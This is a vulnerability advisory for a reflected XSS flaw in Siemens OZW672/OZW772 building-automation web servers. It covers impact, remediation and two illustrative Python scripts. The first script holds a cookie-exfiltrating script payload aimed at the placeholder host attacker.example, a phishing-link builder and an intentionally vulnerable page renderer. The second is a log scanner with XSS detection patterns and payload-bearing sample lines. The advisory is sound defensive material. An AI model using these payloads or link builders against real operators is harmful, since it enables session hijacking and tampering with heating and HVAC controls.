Siemens OZW672 and OZW772 XSS Vulnerability
Monitor 4.7 · ICS-CERT ICSA-16-019-01 · Oct 22, 2016
Attack Vector: Network
Auth Required: None
Complexity: Low
User Interaction: Required
Summary
The Siemens OZW672 and OZW772 web servers, which provide browser-based supervision of Synco building automation (heating, ventilation and air conditioning) controllers, contain a cross-site scripting (XSS) vulnerability in their web interface. Script injected through the interface executes in the browser of an authenticated user, so an attacker who gets an operator to open a crafted link can act within that operator's session or read data the session can reach.
What this means
What could happen
An attacker could trick an authorized operator into opening a crafted link; the embedded script then runs in the operator's authenticated browser session and can issue requests as that operator, for example changing device or plant configuration, or read session data such as cookies that are not flagged HttpOnly. The affected devices are the web front end for building automation plants, so the impact falls on the monitoring and control of heating and HVAC equipment.
Who's at risk
Operators of buildings and facilities whose Synco-based heating or HVAC systems are monitored or controlled through an OZW672 (LPB bus) or OZW772 (KNX bus) web server, for example facility management firms, building operators and HVAC service contractors. The people directly exposed are engineering and operations staff who log in to the device's web interface from a browser that also receives external links (email, instant messaging).
How it could be exploited
An attacker crafts a URL to the OZW web interface that carries a JavaScript payload in a parameter the interface reflects into the page, and delivers it to an operator by email, instant message or another social-engineering channel. When the operator opens the link while logged in, the payload runs in the browser with the operator's session and can issue requests as that operator (changing setpoints, acknowledging or disabling alarms, altering time schedules, and so on).
Prerequisites
- The operator's browser must be able to reach the OZW web interface; the attacker needs no network path to the device, only a way to deliver the link
- The operator must be authenticated to the web interface
- The operator must open the attacker-controlled link while the session is active
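The mechanism behind the prerequisites above, shown as an added example rather than Siemens code or the actual vulnerable page: the advisory does not name the affected parameter, so the page, the query parameter ("name") and the hosts ozw.example and attacker.example are hypothetical stand-ins. The vulnerable render function echoes the parameter unescaped, the fixed one applies HTML output encoding, and build_malicious_url produces the kind of link an operator would be sent.

```python
"""Reflected XSS: unescaped reflection versus HTML-escaped output.

Added illustration, not vendor code. Parameter name, page and hosts are
assumptions; the OZW advisory does not disclose the vulnerable parameter.
"""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Attacker payload: in the victim's authenticated session it would ship the
# document cookie (if not HttpOnly) to an attacker-controlled host.
# attacker.example is a placeholder, not a real collection point.
PAYLOAD = ('<script>new Image().src="https://attacker.example/c?"'
           '+document.cookie</script>')


def build_malicious_url(base: str = "https://ozw.example/status") -> str:
    """Craft the link the attacker sends to the operator (hypothetical path)."""
    return base + "?" + urlencode({"name": PAYLOAD})


def _param(url: str, key: str) -> str:
    """Return the first value of a query parameter, decoded, or ''."""
    return parse_qs(urlsplit(url).query).get(key, [""])[0]


def render_vulnerable(url: str) -> str:
    """Echo the 'name' parameter straight into the page: the XSS bug."""
    name = _param(url, "name")
    return f"<html><body><h1>Plant: {name}</h1></body></html>"


def render_fixed(url: str) -> str:
    """Same page with output encoding: the payload is displayed, not executed."""
    name = html.escape(_param(url, "name"), quote=True)
    return f"<html><body><h1>Plant: {name}</h1></body></html>"


def script_executes(page: str) -> bool:
    """Crude check: does a raw <script> tag survive in the rendered HTML?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    link = build_malicious_url()
    print("phishing link:", link)
    print("vulnerable page runs payload:", script_executes(render_vulnerable(link)))
    print("fixed page runs payload:     ", script_executes(render_fixed(link)))
```

Output encoding of every reflected value is the vendor-side fix; on the operator side, cookie flags (HttpOnly, SameSite) reduce what a successful injection can steal but do not stop it from issuing requests in the session.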
Tags: remotely exploitable · requires user interaction (link click) · affects web-based supervision of building automation plants · fixed in firmware V6.00
Exploitability
Low exploit probability (EPSS 0.2%)
Affected products (2)
Product | Affected Versions | Fix Status
OZW672 | All versions prior to V6.00 | Update to firmware V6.00
OZW772 | All versions prior to V6.00 | Update to firmware V6.00
Remediation & Mitigation
Do now
HARDENING: Place a reverse proxy or Web Application Firewall (WAF) with XSS rules in front of the OZW web interfaces to detect and block script payloads in requests
HARDENING: Restrict network access to OZW web interfaces to specific authorized IP addresses or engineering VLANs; never expose them directly to the internet
WORKAROUND: Train operators and engineering staff not to open unexpected links in email or instant messages, especially ones that reference OZW device management URLs
Schedule — requires maintenance window
PATCH: Update the OZW672/OZW772 firmware to V6.00 or later; the update reboots the device, so plan for a short interruption of remote supervision
HARDENING: Log all web interface access to OZW devices and monitor for requests from unexpected sources or unusual parameter values
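A concrete form of the access-restriction, filtering and logging controls above, as an added example and not a Siemens or ICS-CERT tool: it reads web-server access log lines, fully URL-decodes the request path (so double-encoded payloads are not missed), flags XSS-style patterns, and flags any source address outside the engineering VLAN. The Apache-combined log format, the sample lines and the 10.20.30.0/24 engineering subnet are all constructed assumptions; the OZW devices' own log format may differ.

```python
"""Flag XSS attempts and off-VLAN access in OZW web-interface access logs.

Added example, not vendor tooling. Log format, sample lines and the
engineering subnet are constructed; substitute the site's own values.
"""
import ipaddress
import re
from urllib.parse import unquote

# Assumed engineering VLAN; every other source is reported.
ALLOWED_NETS = [ipaddress.ip_network("10.20.30.0/24")]

# Apache combined-style line: ip ident user [ts] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Markers typical of reflected-XSS payloads, checked after URL decoding.
XSS_RE = re.compile(
    r"<\s*script|javascript\s*:|\bon[a-z]+\s*=|<\s*(img|svg|iframe|body)\b|alert\s*\(",
    re.IGNORECASE,
)


def fully_decode(s: str, rounds: int = 3) -> str:
    """Undo nested percent-encoding so %253C does not slip past the filter."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyze(lines):
    """Return a finding per suspicious line: source ip, decoded path, reasons."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        ip = ipaddress.ip_address(m["ip"])
        path = fully_decode(m["path"])
        reasons = []
        if not any(ip in net for net in ALLOWED_NETS):
            reasons.append("source outside engineering VLAN")
        if XSS_RE.search(path):
            reasons.append("xss pattern in request")
        if reasons:
            findings.append({"ip": str(ip), "path": path, "reasons": reasons})
    return findings


# Constructed sample lines (not real device output).
SAMPLE_LOG = [
    '10.20.30.5 - - [19/Jan/2016:10:01:00 +0000] "GET /status?name=boiler HTTP/1.1" 200 512',
    '10.20.30.7 - - [19/Jan/2016:10:02:10 +0000] '
    '"GET /status?name=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 600',
    '203.0.113.9 - - [19/Jan/2016:10:03:33 +0000] '
    '"GET /status?name=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 640',
    '10.20.30.5 - - [19/Jan/2016:10:04:01 +0000] "POST /login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Run it against the device's real logs (exported or forwarded to a syslog collector) rather than the samples; the decoded payload in each finding is what should be attached to the incident ticket, and a hit from inside the engineering VLAN means an operator's browser has already followed a hostile link.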
Mitigations where the firmware update cannot be applied
OZW672 and OZW772 units that cannot be updated to V6.00 (for example because they are end of life at the site or change-frozen) remain exposed; apply the following compensating control in addition to the hardening above:
HARDENING: Plan replacement of units that cannot be updated with a currently supported Siemens web server model that receives vendor patches and carries current web security controls
CVEs (1)